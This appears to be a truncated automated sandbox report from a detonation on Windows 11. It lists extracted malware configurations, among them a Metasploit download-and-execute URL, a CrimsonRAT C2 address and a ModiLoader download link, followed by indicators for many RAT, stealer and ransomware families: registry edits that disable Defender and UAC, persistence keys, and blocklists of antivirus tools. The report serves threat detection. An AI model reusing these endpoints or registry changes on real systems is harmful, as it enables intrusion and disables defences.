Analysis
-
max time kernel
742s -
max time network
745s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
05-08-2024 22:55
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://pornhub.com
Resource
win11-20240802-en
General
Malware Config
Extracted
metasploit
windows/download_exec
http://149.129.72.37:23456/SNpK
- headers User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP09; NP09; MAAU)
Extracted
crimsonrat
185.136.161.124
Extracted
modiloader
https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x000200000002abab-1181.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
CryptoLocker
Ransomware family with multiple variants.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies WinLogon for persistence 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe" winupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe" winupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe" Blackkomet.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhostw.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2716 5036 rundll32.exe 155 -
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
ModiLoader First Stage 2 IoCs
resource yara_rule behavioral1/files/0x000600000002abb4-1286.dat modiloader_stage1 behavioral1/memory/3488-1296-0x0000000010410000-0x000000001047E000-memory.dmp modiloader_stage1 -
ReZer0 packer 1 IoCs
Detects ReZer0, a packer with multiple versions used in various campaigns.
resource yara_rule behavioral1/memory/5688-2377-0x0000000005180000-0x00000000051A8000-memory.dmp rezer0 -
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 5256 net1.exe 5344 net.exe -
RevengeRat Executable 1 IoCs
resource yara_rule behavioral1/files/0x000200000002abb2-2171.dat revengerat -
Blocklisted process makes network request 1 IoCs
flow pid Process 82 2716 rundll32.exe -
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" Azorult.exe Set value (int) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Azorult.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" Azorult.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Azorult.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Modifies Windows Firewall 2 TTPs 24 IoCs
pid Process 6112 netsh.exe 2464 netsh.exe 800 netsh.exe 5712 netsh.exe 4144 netsh.exe 2160 netsh.exe 2304 netsh.exe 5532 netsh.exe 5616 netsh.exe 1284 netsh.exe 3488 netsh.exe 5708 netsh.exe 1960 netsh.exe 5948 netsh.exe 5924 netsh.exe 5844 netsh.exe 2408 netsh.exe 5804 netsh.exe 880 netsh.exe 840 netsh.exe 1828 netsh.exe 5184 netsh.exe 3648 netsh.exe 5464 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 9 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 5384 attrib.exe 2356 attrib.exe 2484 attrib.exe 716 attrib.exe 4704 attrib.exe 2916 attrib.exe 5736 attrib.exe 4320 attrib.exe 1960 attrib.exe -
Drops startup file 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe NJRat.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA NJRat.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:Zone.Identifier:$DATA NJRat.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe RegSvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:SmartScreen:$DATA RegSvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:Zone.Identifier:$DATA RegSvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe RegSvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe NJRat.exe -
Executes dropped EXE 59 IoCs
pid Process 4100 Blackkomet.exe 1704 winupdate.exe 4588 winupdate.exe 2108 CrimsonRAT.exe 3936 dlrarhsiva.exe 2252 CrimsonRAT.exe 2116 dlrarhsiva.exe 2328 NJRat.exe 3488 NetWire.exe 4812 NetWire.exe 1436 RevengeRAT.exe 5688 WarzoneRAT.exe 548 svchost.exe 1212 svchost.exe 916 AgentTesla.exe 6084 butterflyondesktop.exe 4500 butterflyondesktop.tmp 3176 svchost.exe 4716 ButterflyOnDesktop.exe 3696 Azorult.exe 4024 wini.exe 2420 winit.exe 2364 rutserv.exe 3144 rutserv.exe 5816 rutserv.exe 5284 rutserv.exe 3388 rfusclient.exe 4776 rfusclient.exe 5872 cheat.exe 2248 taskhost.exe 6036 P.exe 1472 ink.exe 5288 svchost.exe 5816 rfusclient.exe 5868 R8.exe 4672 winlog.exe 6004 winlogon.exe 800 Rar.exe 428 taskhostw.exe 5248 RDPWInst.exe 808 winlogon.exe 224 RDPWInst.exe 784 taskhostw.exe 2144 WinNuke.98.exe 1280 ButterflyOnDesktop.exe 3884 ButterflyOnDesktop.exe 5828 ButterflyOnDesktop.exe 5336 ButterflyOnDesktop.exe 2588 ButterflyOnDesktop.exe 4144 ButterflyOnDesktop.exe 872 ButterflyOnDesktop.exe 1104 ButterflyOnDesktop.exe 3648 ButterflyOnDesktop.exe 916 $uckyLocker.exe 200 taskhostw.exe 5304 CryptoLocker.exe 5272 {34184A33-0407-212E-3320-09040709E2C2}.exe 5456 {34184A33-0407-212E-3320-09040709E2C2}.exe 6012 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 5600 svchost.exe -
Modifies file permissions 1 TTPs 62 IoCs
pid Process 6064 icacls.exe 2040 icacls.exe 5560 icacls.exe 4920 icacls.exe 5544 icacls.exe 5660 icacls.exe 4364 icacls.exe 4944 icacls.exe 3040 icacls.exe 4104 icacls.exe 5560 icacls.exe 3576 icacls.exe 5472 icacls.exe 576 icacls.exe 5304 icacls.exe 808 icacls.exe 3392 icacls.exe 6024 icacls.exe 1164 icacls.exe 5372 icacls.exe 2044 icacls.exe 3344 icacls.exe 5708 icacls.exe 5736 icacls.exe 5432 icacls.exe 5772 icacls.exe 5528 icacls.exe 5588 icacls.exe 2804 icacls.exe 5540 icacls.exe 4800 icacls.exe 4708 icacls.exe 5464 icacls.exe 2804 icacls.exe 1104 icacls.exe 6024 icacls.exe 1500 icacls.exe 5960 icacls.exe 5188 icacls.exe 5540 icacls.exe 5944 icacls.exe 2824 icacls.exe 2352 icacls.exe 3580 icacls.exe 5644 icacls.exe 3052 icacls.exe 3572 icacls.exe 5196 icacls.exe 5192 icacls.exe 1888 icacls.exe 5936 icacls.exe 1892 icacls.exe 5720 icacls.exe 3320 icacls.exe 3532 icacls.exe 3736 icacls.exe 5528 icacls.exe 5332 icacls.exe 1604 icacls.exe 2332 icacls.exe 6068 icacls.exe 5600 icacls.exe -
resource yara_rule behavioral1/files/0x000400000002ac6c-3611.dat upx behavioral1/memory/6004-3634-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/6004-3647-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/files/0x000100000002ad15-3667.dat upx behavioral1/memory/808-3672-0x0000000000330000-0x000000000041C000-memory.dmp upx behavioral1/memory/808-3674-0x0000000000330000-0x000000000041C000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe" {34184A33-0407-212E-3320-09040709E2C2}.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe" winupdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe" winupdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe" notepad.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." NJRat.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe" RegSvcs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe" Blackkomet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." NJRat.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" NetWire.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop butterflyondesktop.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe -
pid Process 1092 powershell.exe -
Indicator Removal: Clear Persistence 1 TTPs 3 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 4032 cmd.exe 960 cmd.exe 1596 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs
flow ioc 18 raw.githubusercontent.com 77 raw.githubusercontent.com 86 drive.google.com 146 0.tcp.ngrok.io 232 raw.githubusercontent.com 91 0.tcp.ngrok.io 222 0.tcp.ngrok.io 235 raw.githubusercontent.com 254 0.tcp.ngrok.io 234 iplogger.org 332 0.tcp.ngrok.io 88 drive.google.com 92 0.tcp.ngrok.io 222 raw.githubusercontent.com 222 iplogger.org 235 0.tcp.ngrok.io 250 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 222 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 5 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000100000002acb0-3353.dat autoit_exe behavioral1/files/0x000100000002acc5-3434.dat autoit_exe behavioral1/files/0x000100000002accd-3522.dat autoit_exe behavioral1/memory/808-3672-0x0000000000330000-0x000000000041C000-memory.dmp autoit_exe behavioral1/memory/808-3674-0x0000000000330000-0x000000000041C000-memory.dmp autoit_exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Windupdt\ winupdate.exe File opened for modification C:\Windows\SysWOW64\Windupdt\winupdate.exe attrib.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini powershell.exe File opened for modification C:\Windows\SysWOW64\Windupdt\winupdate.exe Blackkomet.exe File created C:\Windows\SysWOW64\Windupdt\winupdate.exe:Zone.Identifier:$DATA Blackkomet.exe File opened for modification C:\Windows\SysWOW64\Windupdt\ winupdate.exe File created C:\Windows\SysWOW64\Windupdt\winupdate.exe winupdate.exe File created C:\Windows\SysWOW64\Windupdt\winupdate.exe notepad.exe File opened for modification C:\Windows\SysWOW64\Windupdt attrib.exe File opened for modification C:\Windows\System32\GroupPolicy powershell.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe File created C:\Windows\SysWOW64\Windupdt\winupdate.exe:SmartScreen:$DATA Blackkomet.exe File opened for modification C:\Windows\SysWOW64\Windupdt\winupdate.exe winupdate.exe File opened for modification C:\Windows\SysWOW64\Windupdt attrib.exe File opened for modification C:\Windows\SysWOW64\Windupdt\winupdate.exe winupdate.exe File created C:\Windows\SysWOW64\Windupdt\winupdate.exe Blackkomet.exe File opened for modification C:\Windows\SysWOW64\Windupdt\ Blackkomet.exe File created C:\Windows\SysWOW64\Windupdt\winupdate.exe winupdate.exe File opened for modification C:\Windows\SysWOW64\Windupdt\winupdate.exe attrib.exe -
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Control Panel\Desktop\Wallpaper = "0" $uckyLocker.exe -
Suspicious use of SetThreadContext 12 IoCs
description pid Process procid_target PID 4812 set thread context of 2088 4812 NetWire.exe 179 PID 1436 set thread context of 2856 1436 RevengeRAT.exe 182 PID 2856 set thread context of 3988 2856 RegSvcs.exe 183 PID 5688 set thread context of 2468 5688 WarzoneRAT.exe 221 PID 548 set thread context of 4744 548 svchost.exe 256 PID 4744 set thread context of 4980 4744 RegSvcs.exe 257 PID 1212 set thread context of 5236 1212 svchost.exe 298 PID 5236 set thread context of 5320 5236 RegSvcs.exe 299 PID 3176 set thread context of 4880 3176 svchost.exe 311 PID 4880 set thread context of 2292 4880 RegSvcs.exe 312 PID 5288 set thread context of 5768 5288 svchost.exe 364 PID 5768 set thread context of 3124 5768 RegSvcs.exe 365 -
Drops file in Program Files directory 43 IoCs
description ioc Process File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File created C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll AgentTesla.exe File opened for modification C:\Program Files (x86)\Butterfly on Desktop\unins000.dat butterflyondesktop.tmp File opened for modification C:\Program Files (x86)\Microsoft JDX Azorult.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab Azorult.exe File opened for modification C:\Program Files (x86)\Cezurity Azorult.exe File created C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll AgentTesla.exe File opened for modification C:\Program Files (x86)\Zaxar Azorult.exe File opened for modification C:\Program Files\Kaspersky Lab Azorult.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files\AVAST Software Azorult.exe File created C:\Program Files (x86)\Butterfly on Desktop\is-TMLJN.tmp butterflyondesktop.tmp File created C:\Program Files (x86)\Butterfly on Desktop\is-IOG49.tmp butterflyondesktop.tmp File created C:\Program Files (x86)\Butterfly on Desktop\is-N6STH.tmp butterflyondesktop.tmp File opened for modification C:\Program Files\ByteFence Azorult.exe File opened for modification C:\Program Files\SpyHunter Azorult.exe File opened for modification C:\Program Files\ESET Azorult.exe File created C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe AgentTesla.exe File created C:\Program Files (x86)\Butterfly on Desktop\unins000.dat butterflyondesktop.tmp File opened for modification C:\Program Files\Malwarebytes Azorult.exe File created C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml AgentTesla.exe File created C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll AgentTesla.exe File created C:\Program Files (x86)\Butterfly on Desktop\is-C1R79.tmp butterflyondesktop.tmp File opened for modification C:\Program Files\Enigma Software Group Azorult.exe File created C:\Program Files\Common Files\System\iediagcmd.exe Azorult.exe File opened for modification C:\Program Files\COMODO Azorult.exe File opened for modification C:\Program Files (x86)\AVAST Software Azorult.exe File opened for modification C:\Program Files (x86)\AVG Azorult.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File created C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config AgentTesla.exe File opened for modification C:\Program Files (x86)\SpyHunter Azorult.exe File opened for modification C:\Program Files\Cezurity Azorult.exe File opened for modification C:\Program Files\Common Files\McAfee Azorult.exe File opened for modification C:\Program Files (x86)\Panda Security Azorult.exe File opened for modification C:\Program Files (x86)\360 Azorult.exe File opened for modification C:\Program Files\AVG Azorult.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus Azorult.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5472 sc.exe 2588 sc.exe 5624 sc.exe 4792 sc.exe 5196 sc.exe 5164 sc.exe 5908 sc.exe 4104 sc.exe 3016 sc.exe 5544 sc.exe 488 sc.exe 6048 sc.exe 5556 sc.exe 5568 sc.exe 5344 sc.exe 5548 sc.exe 5772 sc.exe 496 sc.exe 2260 sc.exe 5316 sc.exe 3024 sc.exe 1424 sc.exe 4476 sc.exe 3576 sc.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 14 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\Blackkomet.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\WinNuke.98.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\RevengeRAT.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\MadMan.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\CryptoLocker.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\NJRat.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\NetWire.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\WarzoneRAT.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\$uckyLocker.exe:Zone.Identifier msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried 